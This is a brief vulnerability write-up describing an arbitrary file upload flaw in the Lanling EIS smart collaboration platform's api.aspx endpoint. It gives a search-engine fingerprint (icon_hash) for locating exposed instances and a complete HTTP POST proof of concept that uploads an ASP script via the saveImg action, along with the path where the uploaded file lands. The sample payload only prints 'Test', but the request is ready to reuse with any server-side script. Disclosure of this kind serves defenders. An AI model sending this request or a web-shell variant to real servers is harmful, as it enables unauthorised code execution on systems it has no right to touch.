Lanling Eis Smart Collaboration Platform Api Aspx Arbitrary File Upload Vulnerability
Lanling Eis Smart Collaboration Platform Api Aspx Arbitrary File Upload Vulnerability
Lanling EIS smart collaboration platform api.aspx any file upload vulnerability
Vulnerability Description
Lanling EIS smart collaboration platform api.aspx file has arbitrary file upload vulnerability, and attackers can upload any file through the vulnerability.
Vulnerability Impact
Lanling EIS Smart Collaborative Platform
Network surveying and mapping
icon_hash=”953405444”
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 219
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynUqjgvhmkL1dxpCV
Upgrade-Insecure-Requests: 1
------WebKitFormBoundarynUqjgvhmkL1dxpCV
Content-Disposition: form-data; name="file"filename="test.asp"
Content-Type: text/html
<% response.write("Test")%>
------WebKitFormBoundarynUqjgvhmkL1dxpCV--
1
/files/editor_img/xxx/xxx.asp
This post is licensed under CC BY 4.0 by the author.